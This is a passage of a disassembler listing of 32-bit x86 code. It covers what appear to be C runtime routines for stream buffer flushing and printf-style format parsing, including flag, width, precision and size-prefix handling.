		cmp	[eax+0Ch], ebp
		jz	short loc_406D40
		push	offset dword_424064
		push	edi
		mov	edx, ebp
		mov	ecx, eax
		call	sub_408CC4
		mov	eax, [esp+24h+arg_4]

loc_406D40:				; CODE XREF: sub_406C00+12Bj
		mov	ecx, [esp+24h+var_10]
		mov	[eax+0Ch], ecx
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		jz	short loc_406D5B
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402C9E

loc_406D5B:				; CODE XREF: sub_406C00+14Cj
		mov	ecx, [esi+0Ch]
		mov	edx, [esi+8]
		add	ecx, edi
		xor	ecx, [edx+edi]
		call	sub_402C9E
		mov	ecx, [ebx+8]
		mov	edx, edi
		jmp	loc_408C91
; ---------------------------------------------------------------------------

loc_406D75:				; CODE XREF: sub_406C00+50j
		cmp	dword ptr [ebx+0Ch], 0FFFFFFFEh
		jz	loc_406CCF
		push	offset dword_424064
		push	edi
		mov	ecx, ebx
		mov	edx, 0FFFFFFFEh
		call	sub_408CC4
		jmp	loc_406CAB
sub_406C00	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406D96	proc near		; CODE XREF: sub_40307C+9Fp
					; sub_403643+6Ep ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	esi
		mov	esi, [ebp+arg_4]
		push	esi
		call	sub_408FE0
		mov	[ebp+arg_4], eax
		mov	eax, [esi+0Ch]
		test	al, 82h
		pop	ecx
		jnz	short loc_406DC6
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_406DBA:				; CODE XREF: sub_406D96+3Fj
		or	dword ptr [esi+0Ch], 20h
		or	eax, 0FFFFFFFFh
		jmp	loc_406EF3
; ---------------------------------------------------------------------------

loc_406DC6:				; CODE XREF: sub_406D96+17j
		test	al, 40h
		jz	short loc_406DD7
		call	sub_405D93
		mov	dword ptr [eax], 22h
		jmp	short loc_406DBA
; ---------------------------------------------------------------------------

loc_406DD7:				; CODE XREF: sub_406D96+32j
		push	ebx
		xor	ebx, ebx
		test	al, 1
		jz	short loc_406DF4
		test	al, 10h
		mov	[esi+4], ebx
		jz	loc_406E6E
		mov	ecx, [esi+8]
		and	eax, 0FFFFFFFEh
		mov	[esi], ecx
		mov	[esi+0Ch], eax

loc_406DF4:				; CODE XREF: sub_406D96+46j
		mov	eax, [esi+0Ch]
		and	eax, 0FFFFFFEFh
		or	eax, 2
		test	ax, 10Ch
		mov	[esi+0Ch], eax
		mov	[esi+4], ebx
		mov	[ebp+var_4], ebx
		jnz	short loc_406E38
		call	sub_408644
		add	eax, 20h
		cmp	esi, eax
		jz	short loc_406E24
		call	sub_408644
		add	eax, 40h
		cmp	esi, eax
		jnz	short loc_406E31

loc_406E24:				; CODE XREF: sub_406D96+80j
		push	[ebp+arg_4]
		call	sub_40DB00
		test	eax, eax
		pop	ecx
		jnz	short loc_406E38

loc_406E31:				; CODE XREF: sub_406D96+8Cj
		push	esi
		call	sub_40DABC
		pop	ecx

loc_406E38:				; CODE XREF: sub_406D96+74j
					; sub_406D96+99j
		test	word ptr [esi+0Ch], 108h
		push	edi
		jz	loc_406EC5
		mov	eax, [esi+8]
		mov	edi, [esi]
		lea	ecx, [eax+1]
		mov	[esi], ecx
		mov	ecx, [esi+18h]
		sub	edi, eax
		dec	ecx
		cmp	edi, ebx
		mov	[esi+4], ecx
		jle	short loc_406E79
		push	edi
		push	eax
		push	[ebp+arg_4]
		call	sub_40D9E0
		add	esp, 0Ch
		mov	[ebp+var_4], eax
		jmp	short loc_406EBB
; ---------------------------------------------------------------------------

loc_406E6E:				; CODE XREF: sub_406D96+4Dj
		or	eax, 20h
		mov	[esi+0Ch], eax
		or	eax, 0FFFFFFFFh
		jmp	short loc_406EF2
; ---------------------------------------------------------------------------

loc_406E79:				; CODE XREF: sub_406D96+C4j
		mov	ecx, [ebp+arg_4]
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_406E9C
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_406E9C
		mov	eax, ecx
		and	eax, 1Fh
		imul	eax, 28h
		mov	edx, ecx
		sar	edx, 5
		add	eax, dword_437700[edx*4]
		jmp	short loc_406EA1
; ---------------------------------------------------------------------------

loc_406E9C:				; CODE XREF: sub_406D96+E9j
					; sub_406D96+EEj
		mov	eax, offset dword_424BD0

loc_406EA1:				; CODE XREF: sub_406D96+104j
		test	byte ptr [eax+4], 20h
		jz	short loc_406EBB
		push	2
		push	ebx
		push	ebx
		push	ecx
		call	sub_40D301
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	short loc_406EE0

loc_406EBB:				; CODE XREF: sub_406D96+D6j
					; sub_406D96+10Fj
		mov	eax, [esi+8]
		mov	cl, byte ptr [ebp+arg_0]
		mov	[eax], cl
		jmp	short loc_406EDB
; ---------------------------------------------------------------------------

loc_406EC5:				; CODE XREF: sub_406D96+A9j
		xor	edi, edi
		inc	edi
		push	edi
		lea	eax, [ebp+arg_0]
		push	eax
		push	[ebp+arg_4]
		call	sub_40D9E0
		add	esp, 0Ch
		mov	[ebp+var_4], eax

loc_406EDB:				; CODE XREF: sub_406D96+12Dj
		cmp	[ebp+var_4], edi
		jz	short loc_406EE9

loc_406EE0:				; CODE XREF: sub_406D96+123j
		or	dword ptr [esi+0Ch], 20h
		or	eax, 0FFFFFFFFh
		jmp	short loc_406EF1
; ---------------------------------------------------------------------------

loc_406EE9:				; CODE XREF: sub_406D96+148j
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh

loc_406EF1:				; CODE XREF: sub_406D96+151j
		pop	edi

loc_406EF2:				; CODE XREF: sub_406D96+E1j
		pop	ebx

loc_406EF3:				; CODE XREF: sub_406D96+2Bj
		pop	esi
		leave
		retn
sub_406D96	endp


; =============== S U B	R O U T	I N E =======================================



sub_406EF6	proc near		; CODE XREF: sub_406F29+11p
					; sub_406F4D+22p ...
		test	byte ptr [ecx+0Ch], 40h
		jz	short loc_406F02
		cmp	dword ptr [ecx+8], 0
		jz	short loc_406F26

loc_406F02:				; CODE XREF: sub_406EF6+4j
		dec	dword ptr [ecx+4]
		js	short loc_406F12
		mov	edx, [ecx]
		mov	[edx], al
		inc	dword ptr [ecx]
		movzx	eax, al
		jmp	short loc_406F1E
; ---------------------------------------------------------------------------

loc_406F12:				; CODE XREF: sub_406EF6+Fj
		movsx	eax, al
		push	ecx
		push	eax
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_406F1E:				; CODE XREF: sub_406EF6+1Aj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_406F26
		or	[esi], eax
		retn
; ---------------------------------------------------------------------------

loc_406F26:				; CODE XREF: sub_406EF6+Aj
					; sub_406EF6+2Bj
		inc	dword ptr [esi]
		retn
sub_406EF6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406F29	proc near		; CODE XREF: sub_406F97+853p
					; sub_406F97+880p ...

arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, eax
		jmp	short loc_406F44
; ---------------------------------------------------------------------------

loc_406F31:				; CODE XREF: sub_406F29+1Fj
		mov	ecx, [ebp+arg_8]
		mov	al, [ebp+arg_0]
		dec	[ebp+arg_4]
		call	sub_406EF6
		cmp	dword ptr [esi], 0FFFFFFFFh
		jz	short loc_406F4A

loc_406F44:				; CODE XREF: sub_406F29+6j
		cmp	[ebp+arg_4], 0
		jg	short loc_406F31

loc_406F4A:				; CODE XREF: sub_406F29+19j
		pop	esi
		pop	ebp
		retn
sub_406F29	endp


; =============== S U B	R O U T	I N E =======================================



sub_406F4D	proc near		; CODE XREF: sub_406F97+867p
					; sub_406F97+8CEp ...

arg_0		= dword	ptr  4

		test	byte ptr [edi+0Ch], 40h
		push	ebx
		push	esi
		mov	esi, eax
		mov	ebx, ecx
		jz	short loc_406F8D
		cmp	dword ptr [edi+8], 0
		jnz	short loc_406F8D
		mov	eax, [esp+8+arg_0]
		add	[esi], eax
		jmp	short loc_406F94
; ---------------------------------------------------------------------------

loc_406F67:				; CODE XREF: sub_406F4D+45j
		mov	al, [ebx]
		dec	[esp+8+arg_0]
		mov	ecx, edi
		call	sub_406EF6
		inc	ebx
		cmp	dword ptr [esi], 0FFFFFFFFh
		jnz	short loc_406F8D
		call	sub_405D93
		cmp	dword ptr [eax], 2Ah
		jnz	short loc_406F94
		mov	ecx, edi
		mov	al, 3Fh
		call	sub_406EF6

loc_406F8D:				; CODE XREF: sub_406F4D+Aj
					; sub_406F4D+10j ...
		cmp	[esp+8+arg_0], 0
		jg	short loc_406F67

loc_406F94:				; CODE XREF: sub_406F4D+18j
					; sub_406F4D+35j
		pop	esi
		pop	ebx
		retn
sub_406F4D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=1F8h


sub_406F97	proc near		; CODE XREF: sub_40307C+80p
					; sub_403643+53p ...

var_278		= dword	ptr -278h
var_274		= dword	ptr -274h
var_270		= dword	ptr -270h
var_26C		= dword	ptr -26Ch
var_268		= dword	ptr -268h
var_260		= dword	ptr -260h
var_25C		= byte ptr -25Ch
var_254		= dword	ptr -254h
var_250		= byte ptr -250h
var_24C		= dword	ptr -24Ch
var_248		= dword	ptr -248h
var_244		= dword	ptr -244h
var_240		= dword	ptr -240h
var_23C		= dword	ptr -23Ch
var_238		= dword	ptr -238h
var_234		= dword	ptr -234h
var_230		= byte ptr -230h
var_22F		= byte ptr -22Fh
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_211		= byte ptr -211h
var_210		= dword	ptr -210h
var_20C		= byte ptr -20Ch
var_D		= byte ptr -0Dh
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		lea	ebp, [esp-1F8h]
		sub	esp, 278h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+1F8h+var_4], eax
		mov	eax, [ebp+1F8h+arg_0]
		push	ebx
		mov	ebx, [ebp+1F8h+arg_4]
		push	esi
		xor	esi, esi
		push	edi
		mov	edi, [ebp+1F8h+arg_C]
		push	[ebp+1F8h+arg_8]
		lea	ecx, [ebp+1F8h+var_25C]
		mov	[ebp+1F8h+var_228], eax
		mov	[ebp+1F8h+var_224], edi
		mov	[ebp+1F8h+var_244], esi
		mov	[ebp+1F8h+var_210], esi
		mov	[ebp+1F8h+var_238], esi
		mov	[ebp+1F8h+var_218], esi
		mov	[ebp+1F8h+var_234], esi
		mov	[ebp+1F8h+var_248], esi
		mov	[ebp+1F8h+var_23C], esi
		call	sub_402CAD
		cmp	[ebp+1F8h+var_228], esi
		jnz	short loc_407024

loc_406FF7:				; CODE XREF: sub_406F97+E5j
					; sub_406F97+138j ...
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		push	esi

loc_407007:				; CODE XREF: sub_406F97+948j
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+1F8h+var_250], 0
		jz	short loc_40701C
		mov	eax, [ebp+1F8h+var_254]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40701C:				; CODE XREF: sub_406F97+7Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_4078F4
; ---------------------------------------------------------------------------

loc_407024:				; CODE XREF: sub_406F97+5Ej
		mov	eax, [ebp+1F8h+var_228]
		test	byte ptr [eax+0Ch], 40h
		jnz	loc_4070D5
		push	eax
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_407073
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_407073
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		push	[ebp+1F8h+var_228]
		sar	eax, 5
		lea	esi, ds:437700h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [esi]
		pop	ecx
		pop	ecx
		xor	esi, esi
		jmp	short loc_407078
; ---------------------------------------------------------------------------

loc_407073:				; CODE XREF: sub_406F97+A4j
					; sub_406F97+B2j
		mov	eax, offset dword_424BD0

loc_407078:				; CODE XREF: sub_406F97+DAj
		test	byte ptr [eax+24h], 7Fh
		jnz	loc_406FF7
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_4070C6
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_4070C6
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		push	[ebp+1F8h+var_228]
		sar	eax, 5
		lea	esi, ds:437700h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [esi]
		pop	ecx
		pop	ecx
		xor	esi, esi
		jmp	short loc_4070CB
; ---------------------------------------------------------------------------

loc_4070C6:				; CODE XREF: sub_406F97+F7j
					; sub_406F97+105j
		mov	eax, offset dword_424BD0

loc_4070CB:				; CODE XREF: sub_406F97+12Dj
		test	byte ptr [eax+24h], 80h
		jnz	loc_406FF7

loc_4070D5:				; CODE XREF: sub_406F97+94j
		cmp	ebx, esi
		jz	loc_406FF7
		mov	dl, [ebx]
		xor	ecx, ecx
		test	dl, dl
		mov	[ebp+1F8h+var_22C], esi
		mov	[ebp+1F8h+var_220], esi
		mov	[ebp+1F8h+var_24C], esi
		mov	[ebp+1F8h+var_211], dl
		jz	loc_4078E4

loc_4070F5:				; CODE XREF: sub_406F97+931j
		inc	ebx
		cmp	[ebp+1F8h+var_22C], 0
		mov	[ebp+1F8h+var_240], ebx
		jl	loc_4078E4
		mov	al, dl
		sub	al, 20h
		cmp	al, 58h
		ja	short loc_40711C
		movsx	eax, dl
		movzx	eax, ds:byte_41E4F8[eax]
		and	eax, 0Fh
		xor	esi, esi
		jmp	short loc_407120
; ---------------------------------------------------------------------------

loc_40711C:				; CODE XREF: sub_406F97+172j
		xor	esi, esi
		xor	eax, eax

loc_407120:				; CODE XREF: sub_406F97+183j
		movsx	eax, ds:byte_41E518[ecx+eax*8]
		push	7
		sar	eax, 4
		pop	ecx
		cmp	eax, ecx	; switch 8 cases
		mov	[ebp+1F8h+var_26C], eax
		ja	loc_4078B4	; default
		jmp	ds:off_40790F[eax*4] ; switch jump

loc_407140:				; DATA XREF: .text:off_40790Fo
		or	[ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00407139 case 1
		mov	[ebp+1F8h+var_270], esi
		mov	[ebp+1F8h+var_248], esi
		mov	[ebp+1F8h+var_238], esi
		mov	[ebp+1F8h+var_234], esi
		mov	[ebp+1F8h+var_210], esi
		mov	[ebp+1F8h+var_23C], esi
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40715B:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		movsx	eax, dl		; jumptable 00407139 case 2
		sub	eax, 20h
		jz	short loc_4071A1
		sub	eax, 3
		jz	short loc_407195
		sub	eax, 8
		jz	short loc_40718C
		dec	eax
		dec	eax
		jz	short loc_407183
		sub	eax, 3
		jnz	loc_4078B4	; default
		or	[ebp+1F8h+var_210], 8
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407183:				; CODE XREF: sub_406F97+1D8j
		or	[ebp+1F8h+var_210], 4
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40718C:				; CODE XREF: sub_406F97+1D4j
		or	[ebp+1F8h+var_210], 1
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407195:				; CODE XREF: sub_406F97+1CFj
		or	[ebp+1F8h+var_210], 80h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071A1:				; CODE XREF: sub_406F97+1CAj
		or	[ebp+1F8h+var_210], 2
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071AA:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		cmp	dl, 2Ah		; jumptable 00407139 case 3
		jnz	short loc_4071CF
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		cmp	edi, esi
		mov	[ebp+1F8h+var_238], edi
		jge	loc_4078B4	; default
		or	[ebp+1F8h+var_210], 4
		neg	[ebp+1F8h+var_238]
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071CF:				; CODE XREF: sub_406F97+216j
		mov	eax, [ebp+1F8h+var_238]
		imul	eax, 0Ah
		movsx	ecx, dl
		lea	eax, [eax+ecx-30h]
		mov	[ebp+1F8h+var_238], eax
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071E4:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		mov	[ebp+1F8h+var_218], esi	; jumptable 00407139 case 4
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071EC:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		cmp	dl, 2Ah		; jumptable 00407139 case 5
		jnz	short loc_40720E
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		cmp	edi, esi
		mov	[ebp+1F8h+var_218], edi
		jge	loc_4078B4	; default
		or	[ebp+1F8h+var_218], 0FFFFFFFFh
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40720E:				; CODE XREF: sub_406F97+258j
		mov	eax, [ebp+1F8h+var_218]
		imul	eax, 0Ah
		movsx	ecx, dl
		lea	eax, [eax+ecx-30h]
		mov	[ebp+1F8h+var_218], eax
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407223:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		cmp	dl, 49h		; jumptable 00407139 case 6
		jz	short loc_40726E
		cmp	dl, 68h
		jz	short loc_407265
		cmp	dl, 6Ch
		jz	short loc_407247
		cmp	dl, 77h
		jnz	loc_4078B4	; default
		or	[ebp+1F8h+var_210], 800h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407247:				; CODE XREF: sub_406F97+299j
		cmp	byte ptr [ebx],	6Ch
		jnz	short loc_40725C
		inc	ebx
		or	[ebp+1F8h+var_210], 1000h
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40725C:				; CODE XREF: sub_406F97+2B3j
		or	[ebp+1F8h+var_210], 10h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407265:				; CODE XREF: sub_406F97+294j
		or	[ebp+1F8h+var_210], 20h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40726E:				; CODE XREF: sub_406F97+28Fj
		mov	al, [ebx]
		cmp	al, 36h
		jnz	short loc_40728B
		cmp	byte ptr [ebx+1], 34h
		jnz	short loc_40728B
		inc	ebx
		inc	ebx
		or	[ebp+1F8h+var_210], 8000h
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40728B:				; CODE XREF: sub_406F97+2DBj
					; sub_406F97+2E1j
		cmp	al, 33h
		jnz	short loc_4072A6
		cmp	byte ptr [ebx+1], 32h
		jnz	short loc_4072A6
		inc	ebx
		inc	ebx
		and	[ebp+1F8h+var_210], 0FFFF7FFFh
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4072A6:				; CODE XREF: sub_406F97+2F6j
					; sub_406F97+2FCj
		cmp	al, 64h
		jz	loc_4078B4	; default
		cmp	al, 69h
		jz	loc_4078B4	; default
		cmp	al, 6Fh
		jz	loc_4078B4	; default
		cmp	al, 75h
		jz	loc_4078B4	; default
		cmp	al, 78h
		jz	loc_4078B4	; default
		cmp	al, 58h
		jz	loc_4078B4	; default
		mov	[ebp+1F8h+var_26C], esi

loc_4072D9:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		lea	eax, [ebp+1F8h+var_25C]	; jumptable 00407139 case 0
		push	eax
		movzx	eax, dl
		push	eax
		mov	[ebp+1F8h+var_23C], esi
		call	sub_40CFC0
		pop	ecx
		test	eax, eax
		mov	al, [ebp+1F8h+var_211]
		pop	ecx
		jz	short loc_40730B
		mov	ecx, [ebp+1F8h+var_228]
		lea	esi, [ebp+1F8h+var_22C]
		call	sub_406EF6
		mov	al, [ebx]
		inc	ebx
		test	al, al
		mov	[ebp+1F8h+var_240], ebx
		jz	loc_4078CD

loc_40730B:				; CODE XREF: sub_406F97+359j
		mov	ecx, [ebp+1F8h+var_228]
		lea	esi, [ebp+1F8h+var_22C]
		call	sub_406EF6
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40731B:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		movsx	eax, dl		; jumptable 00407139 case 7
		cmp	eax, 64h
		jg	loc_407499
		jz	loc_407518
		cmp	eax, 53h
		jg	loc_4073E1
		jz	short loc_407392
		sub	eax, 41h
		jz	short loc_40734D
		dec	eax
		dec	eax
		jz	short loc_407381
		dec	eax
		dec	eax
		jz	short loc_40734D
		dec	eax
		dec	eax
		jnz	loc_40779C

loc_40734D:				; CODE XREF: sub_406F97+3A4j
					; sub_406F97+3ACj
		add	dl, 20h
		mov	[ebp+1F8h+var_270], 1
		mov	[ebp+1F8h+var_211], dl

loc_40735A:				; CODE XREF: sub_406F97+459j
					; sub_406F97+51Dj
		or	[ebp+1F8h+var_210], 40h
		cmp	[ebp+1F8h+var_218], esi
		lea	ebx, [ebp+1F8h+var_20C]
		mov	eax, 200h
		mov	[ebp+1F8h+var_21C], ebx
		mov	[ebp+1F8h+var_260], eax
		jge	loc_40753C
		mov	[ebp+1F8h+var_218], 6
		jmp	loc_40758A
; ---------------------------------------------------------------------------

loc_407381:				; CODE XREF: sub_406F97+3A8j
		test	word ptr [ebp+1F8h+var_210], 830h
		jnz	short loc_4073FE
		or	[ebp+1F8h+var_210], 800h
		jmp	short loc_4073FE
; ---------------------------------------------------------------------------

loc_407392:				; CODE XREF: sub_406F97+39Fj
		test	word ptr [ebp+1F8h+var_210], 830h
		jnz	short loc_4073A1
		or	[ebp+1F8h+var_210], 800h

loc_4073A1:				; CODE XREF: sub_406F97+401j
					; sub_406F97+694j
		mov	ecx, [ebp+1F8h+var_218]
		cmp	ecx, 0FFFFFFFFh
		jnz	short loc_4073AE
		mov	ecx, 7FFFFFFFh

loc_4073AE:				; CODE XREF: sub_406F97+410j
		add	edi, 4
		test	word ptr [ebp+1F8h+var_210], 810h
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		mov	[ebp+1F8h+var_21C], edi
		jz	loc_40777A
		cmp	edi, esi
		jnz	short loc_4073D2
		mov	eax, off_424928
		mov	[ebp+1F8h+var_21C], eax

loc_4073D2:				; CODE XREF: sub_406F97+431j
		mov	eax, [ebp+1F8h+var_21C]
		mov	[ebp+1F8h+var_23C], 1
		jmp	loc_40776F
; ---------------------------------------------------------------------------

loc_4073E1:				; CODE XREF: sub_406F97+399j
		sub	eax, 58h
		jz	loc_407623
		dec	eax
		dec	eax
		jz	short loc_40744B
		sub	eax, ecx
		jz	loc_40735A
		dec	eax
		dec	eax
		jnz	loc_40779C

loc_4073FE:				; CODE XREF: sub_406F97+3F0j
					; sub_406F97+3F9j
		add	edi, 4
		test	word ptr [ebp+1F8h+var_210], 810h
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407433
		movzx	eax, word ptr [edi-4]
		push	eax
		push	200h
		lea	eax, [ebp+1F8h+var_20C]
		push	eax
		lea	eax, [ebp+1F8h+var_220]
		push	eax
		call	sub_40DCF2
		add	esp, 10h
		test	eax, eax
		jz	short loc_407440
		mov	[ebp+1F8h+var_248], 1
		jmp	short loc_407440
; ---------------------------------------------------------------------------

loc_407433:				; CODE XREF: sub_406F97+473j
		mov	al, [edi-4]
		mov	[ebp+1F8h+var_20C], al
		mov	[ebp+1F8h+var_220], 1

loc_407440:				; CODE XREF: sub_406F97+491j
					; sub_406F97+49Aj
		lea	eax, [ebp+1F8h+var_20C]
		mov	[ebp+1F8h+var_21C], eax
		jmp	loc_40779C
; ---------------------------------------------------------------------------

loc_40744B:				; CODE XREF: sub_406F97+455j
		mov	eax, [edi]
		add	edi, 4
		cmp	eax, esi
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407485
		mov	ecx, [eax+4]
		cmp	ecx, esi
		jz	short loc_407485
		test	word ptr [ebp+1F8h+var_210], 800h
		movsx	eax, word ptr [eax]
		mov	[ebp+1F8h+var_21C], ecx
		jz	short loc_40747D
		cdq
		sub	eax, edx
		sar	eax, 1
		mov	[ebp+1F8h+var_23C], 1
		jmp	loc_407799
; ---------------------------------------------------------------------------

loc_40747D:				; CODE XREF: sub_406F97+4D3j
		mov	[ebp+1F8h+var_23C], esi
		jmp	loc_407799
; ---------------------------------------------------------------------------

loc_407485:				; CODE XREF: sub_406F97+4BEj
					; sub_406F97+4C5j
		mov	eax, off_424924
		mov	[ebp+1F8h+var_21C], eax
		push	eax

loc_40748E:				; CODE XREF: sub_406F97+680j
		call	sub_4046F0
		pop	ecx
		jmp	loc_407799
; ---------------------------------------------------------------------------

loc_407499:				; CODE XREF: sub_406F97+38Aj
		cmp	eax, 70h
		jg	loc_407628
		jz	loc_40761C
		cmp	eax, 65h
		jl	loc_40779C
		cmp	eax, 67h
		jle	loc_40735A
		cmp	eax, 69h
		jz	short loc_407518
		cmp	eax, 6Eh
		jz	short loc_4074E3
		cmp	eax, 6Fh
		jnz	loc_40779C
		test	byte ptr [ebp+1F8h+var_210], 80h
		mov	[ebp+1F8h+var_220], 8
		jz	short loc_407523
		or	[ebp+1F8h+var_210], 200h
		jmp	short loc_407523
; ---------------------------------------------------------------------------

loc_4074E3:				; CODE XREF: sub_406F97+52Bj
		mov	esi, [edi]
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		call	sub_40DB7D
		test	eax, eax
		jz	loc_4078CD
		test	byte ptr [ebp+1F8h+var_210], 20h
		jz	short loc_407507
		mov	ax, word ptr [ebp+1F8h+var_22C]
		mov	[esi], ax
		jmp	short loc_40750C
; ---------------------------------------------------------------------------

loc_407507:				; CODE XREF: sub_406F97+565j
		mov	eax, [ebp+1F8h+var_22C]
		mov	[esi], eax

loc_40750C:				; CODE XREF: sub_406F97+56Ej
		mov	[ebp+1F8h+var_248], 1
		jmp	loc_4078A1
; ---------------------------------------------------------------------------

loc_407518:				; CODE XREF: sub_406F97+390j
					; sub_406F97+526j
		or	[ebp+1F8h+var_210], 40h

loc_40751C:				; CODE XREF: sub_406F97+69Cj
		mov	[ebp+1F8h+var_220], 0Ah

loc_407523:				; CODE XREF: sub_406F97+541j
					; sub_406F97+54Aj ...
		mov	ecx, [ebp+1F8h+var_210]
		test	cx, cx
		jns	loc_407672

loc_40752F:				; CODE XREF: sub_406F97+6E0j
		mov	eax, [edi]
		mov	edx, [edi+4]
		add	edi, 8
		jmp	loc_4076A7
; ---------------------------------------------------------------------------

loc_40753C:				; CODE XREF: sub_406F97+3D8j
		jnz	short loc_40754C
		cmp	dl, 67h
		jnz	short loc_40758A
		mov	[ebp+1F8h+var_218], 1
		jmp	short loc_40758A
; ---------------------------------------------------------------------------

loc_40754C:				; CODE XREF: sub_406F97:loc_40753Cj
		cmp	[ebp+1F8h+var_218], eax
		jle	short loc_407554
		mov	[ebp+1F8h+var_218], eax

loc_407554:				; CODE XREF: sub_406F97+5B8j
		cmp	[ebp+1F8h+var_218], 0A3h
		jle	short loc_40758A
		mov	esi, [ebp+1F8h+var_218]
		add	esi, 15Dh
		push	esi
		call	sub_407CFA
		test	eax, eax
		mov	dl, [ebp+1F8h+var_211]
		pop	ecx
		mov	[ebp+1F8h+var_24C], eax
		jz	short loc_407581
		mov	[ebp+1F8h+var_21C], eax
		mov	[ebp+1F8h+var_260], esi
		mov	ebx, eax
		jmp	short loc_407588
; ---------------------------------------------------------------------------

loc_407581:				; CODE XREF: sub_406F97+5DEj
		mov	[ebp+1F8h+var_218], 0A3h

loc_407588:				; CODE XREF: sub_406F97+5E8j
		xor	esi, esi

loc_40758A:				; CODE XREF: sub_406F97+3E5j
					; sub_406F97+5AAj ...
		mov	eax, [edi]
		add	edi, 8
		mov	[ebp+1F8h+var_278], eax
		mov	eax, [edi-4]
		mov	[ebp+1F8h+var_274], eax
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	[ebp+1F8h+var_270]
		movsx	eax, dl
		push	[ebp+1F8h+var_218]
		mov	[ebp+1F8h+var_224], edi
		push	eax
		push	[ebp+1F8h+var_260]
		lea	eax, [ebp+1F8h+var_278]
		push	ebx
		push	eax
		push	off_424F98
		call	sub_405753
		pop	ecx
		call	eax
		mov	edi, [ebp+1F8h+var_210]
		add	esp, 1Ch
		and	edi, 80h
		jz	short loc_4075E7
		cmp	[ebp+1F8h+var_218], esi
		jnz	short loc_4075E7
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	ebx
		push	off_424FA4
		call	sub_405753
		pop	ecx
		call	eax
		pop	ecx
		pop	ecx

loc_4075E7:				; CODE XREF: sub_406F97+634j
					; sub_406F97+639j
		cmp	[ebp+1F8h+var_211], 67h
